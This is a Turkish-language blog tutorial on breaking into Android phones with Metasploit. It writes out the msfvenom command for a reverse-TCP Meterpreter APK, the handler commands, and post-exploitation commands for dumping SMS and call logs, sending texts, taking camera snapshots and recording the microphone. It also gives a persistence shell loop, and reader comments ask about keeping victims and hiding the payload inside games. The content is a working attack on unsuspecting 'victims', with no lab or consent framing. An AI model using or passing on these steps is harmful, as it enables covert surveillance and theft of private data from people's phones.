Kategoriler
Android Linux Metasploit Siber Güvenlik

Metasploit ile Android Telefona Sızma

Metasploit linux içerisinde bulunan bazı pentest işlemlerini gerçekleştirmek için kullanılan bir framework altyapısıdır. Windows üzerinde de kullanmanın bazı yolları var. Ancak bu yazıda onu anlatmayacağım.
 
Android telefonlara payload apk hazırlayarak sızmayı göstereceğim. Payload, karşı tarafa sızmamızda kullanacağımız dosya, malzeme vs. diyebiliriz. Hazırlayacağımız apkyı karşı tarafın kurması ve bir defa açması yeterli.
 
Önce msfvenom ile payloadımızı oluşturalım. Root terminalini açın ve aşağıdaki kodu girin.
 

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.2 LPORT=1604 R > Desktop/test.apk

Sahte apk oluşturma
 
Yukarıdaki ekran görüntüsünde duralım. Orada msfvenom kullanarak android reverse_tcp payloadını seçtik. Daha sonra host ve port adresi seçiyoruz.
Eğer kurbanımız ile aynı ağı kullanıyorsanız local ip adresinizi girmeniz gerek. Linux’ta terminale ifconfig yazarak, Windows’ta komut penceresine ipconfig yazarak öğrenebilirsiniz. Dikkat ederseniz işlem sonunda masaüstünde test.apk dosyası oluşmuş arkaplanda.
 
Şayet kurban başka bir internet ağına bağlı ise dış ip adresinizi girin. Başka ağda yapılacak bağlantı işlemleri, aynı ağdakinden uzun sürebilir. Bunu da ister internetten ister başka şekilde öğrenirsiniz zaten. İster yerel ağ, ister başka ağda olsun her ihtimalde de port açmanız gerekecek yalnız.
 
Daha sonra msfconsole yazarak yavaştan başlıyoruz.
 
metasploit giriş
 
Daha sonra sırası ile aşağıdaki komutları giriyoruz.
  1. use exploit/multi/handler
  2. set payload android/meterpreter/reverse_tcp
  3. set LHOST 192.168.2.3
  4. set LPORT 1604
  5. exploit
3. maddede yine local ya da dış ip adresimizi giriyoruz. 4. maddede ise port numarasını giriyoruz tekrar. Son olarakexploit diyerek oluşturduğumuz payloadı dinlemeye başlıyoruz. Dosyayı açan kurbanlar burada birer birer listelenecek.
payload seçimi ve ayarları
Bağlantı geldiğinde aşağıdaki görselde ilk sütundaki gibi bir yazı ile karşılaşacaksınız. Bağlantı koptuğunda ise bir altındaki sütunla…
 
Exploit

 

 “help” komutunu girerek neler yapabileceğinizin detaylı bir dökümüne ulaşabilirsiniz.Birkaç can alıcı komutu aşağıya yazayım.
 
check_root : Cihaz rootlu mu onu gösterir.
dump_sms : Telefondaki tüm smsleri toplar.
dump_calllog : Tüm arama kayıtlarını toplar.
send_sms : İstediğiniz bir numaraya telefon sahibi adına sms gönderebilirsiniz.
wlan_geolocate : Bağlı olduğu wifi ağına ait adresi bulabilirsiniz.
webcam_snap : Telefon kamerasından anlık bir fotoğraf çekerek bunu bilgisayarınıza kaydedebilirsiniz.
record_mic : Anlık ses kaydı toplayabilirsiniz.  
 
Ek olarak istediğiniz bir komuta dair yardım da alabilirsiniz. Örneğin “record_mic -h” yazarak bu komut ile başka neler yapabildiğinizi görebilirsiniz.

Kurban uygulamayı kapatsa dahi arkaplanda uygulamayı çalıştırarak takip etmeye devam etmek isterseniz aşağıdaki kodu bir txt dosyasına kaydedin ve uzantısını “.sh” olarak kaydedin. Daha sonra karşı telefona yükleyin. Bunu“help” yardımı ile gördüğünüz komutlardan birisi ile halletmeniz mümkün.

— — — — — — — — — —
#!/bin/bash
while true
do am start — user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done
— — — — — — — — — —
Tüm bunları yaptıktan sonra terminale shell yazın ve dosyayı yüklediğiniz konuma giderek “sh dosyaismi.sh”yazarak çalıştırın. Bundan sonra uygulama kapansa da siz istediğiniz işlemleri yapmaya devam edebilirsiniz.

“Metasploit ile Android Telefona Sızma” için 6 yanıt

Ayriyeten bende sanal makine olduğu için local host mevcut değil sabit ip ve port açarak mı yapacağız eğer öyleyse açıklarmısınız teşekkürler

Sormak istediğim şu ip sabitleme lazım benim bunun için belirli bir ücret ödenmekte başka türlü olmamakta eğer PC kapanıp açılırsa kurbanlar gidiyor bunu engellemenin bir yolu yokmu

Kalıcılığı sağlamanın yollarını bizlere aktarabilir misiniz? Bu payloadu kullanılabilir bir apk ile birleştirebilir miyiz? Örneğin dosya gezginleri oyunlar vb.

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

This site uses Akismet to reduce spam. Learn how your comment data is processed.